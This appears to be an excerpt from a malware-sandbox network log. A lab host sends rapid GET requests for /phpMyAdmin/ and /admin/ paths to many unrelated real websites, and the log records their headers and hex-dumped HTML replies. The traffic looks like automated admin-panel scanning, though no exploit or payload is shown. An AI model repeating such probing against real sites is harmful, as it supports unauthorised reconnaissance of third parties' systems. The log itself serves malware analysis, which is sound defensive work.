                                                                                                                                                                                                                                                                                                                                                                157192.168.2.663699188.212.100.154443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=6pvqm6q62njom0hjf0nsedqk27; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:36 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC825INData Raw: 32 31 36 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 7a 61 72 6b 61 6e 61 32 2e 72 6f 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 61 72 6b 61 6e 61 32 20 2d 20 50 56 4d 20 48 41 52 44 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 61 72 6b 61 6e 61 32 20 65 73 74 65 20 63 65 6c 20 6d 61 69 20 62 75 6e 20 73 65 72 76 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2163<html><head><meta property="og:url" content="https://zarkana2.ro/" /><meta property="og:type" content="website" /><meta property="og:title" content="Zarkana2 - PVM HARD" /><meta property="og:description" content="Zarkana2 este cel mai bun serve
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC7730INData Raw: 63 6c 61 73 69 63 2c 73 65 72 76 65 72 2c 70 72 69 76 61 74 2c 73 65 72 76 65 72 20 70 72 69 76 61 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 31 30 22 3e 0a 3c 74 69 74 6c 65 3e 5a 61 72 6b 61 6e 61 32 20 2d 20 50 56 4d 20 48 41 52 44 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 35 36 33 35 37 32 31 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: clasic,server,privat,server privat" /><meta name="viewport" content="width=1110"><title>Zarkana2 - PVM HARD</title><link rel="icon" type="image/png" href="images/favicon.png" ><script async src="https://www.googletagmanager.com/gtag/js?id=UA-75635721-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC3789INData Raw: 65 63 31 0d 0a 0a 09 09 3c 74 72 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 0a 09 09 3c 74 64 20 77 69 64 74 68 3d 22 32 35 22 3e 3c 69 6d 67 20 73 72 63 3d 27 69 6d 61 67 65 73 2f 72 61 6e 6b 69 6e 67 2f 72 61 6e 6b 69 6e 67 5f 66 69 72 73 74 5f 70 6c 61 63 65 2e 70 6e 67 27 20 2f 3e 3c 2f 74 64 3e 0a 09 09 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 22 3e 55 6e 69 71 75 65 3c 2f 74 64 3e 0a 09 09 3c 2f 74 72 3e 20 0a 09 09 3c 74 72 3e 0a 09 09 09 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 33 22 20 68 65 69 67 68 74 3d 22 35 22 3e 3c 2f 74 64 3e 0a 09 09 3c 2f 74 72 3e 0a 09 3c 2f 74 61 62 6c 65 3e 0a 09 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 77 6d 62 6d 32 5f 31 39
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ec1<tr class="top"><td width="25"><img src='images/ranking/ranking_first_place.png' /></td><td width="100">Unique</td></tr> <tr><td colspan="3" height="5"></td></tr></table></td> </tr> <tr> <td><img src="images/wmbm2_19


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                158192.168.2.663156195.85.23.95443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC339OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC858INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: fv=ZQp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded1806-web12
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5cec727bb4-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC88INData Raw: 35 32 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 52<html><head><meta http-equiv="refresh" content="0;url=/phpmyadmin"/></head></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                159192.168.2.66364577.240.114.212443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC335INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:17:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache-Coyote/1.1
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1060
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1060INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 30 2e 31 34 20 28 44 65 62 69 61 6e 29 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                160192.168.2.663421138.197.59.199443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=dw-1Bdqxl86HApBORrnH4OZj.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                161192.168.2.665137172.66.43.117443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC168OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC761INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                www-authenticate: Basic realm="EnterPassword"
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L9kkyoQvPW6fSkIWqiKcni1N2rwwLhWOAFaSnzsPKS%2Fu9w8OCMBE65DYS5%2FsHV43WABcgJC%2FIULWQFh2R20KsNjlQQSw9W9EtqUMOczeY4UdD%2FJPQXxyDF41s2713Xc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5eb8c94566-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC608INData Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC98INData Raw: 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: idden</h2><p>Access to this resource on the server is denied!</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                162192.168.2.663479104.22.74.220443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1186INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e0b5d6761-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC183INData Raw: 33 35 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 357a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" cont
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 74 79 6c 65 3e 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oiLz48L3N2Zz4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-but
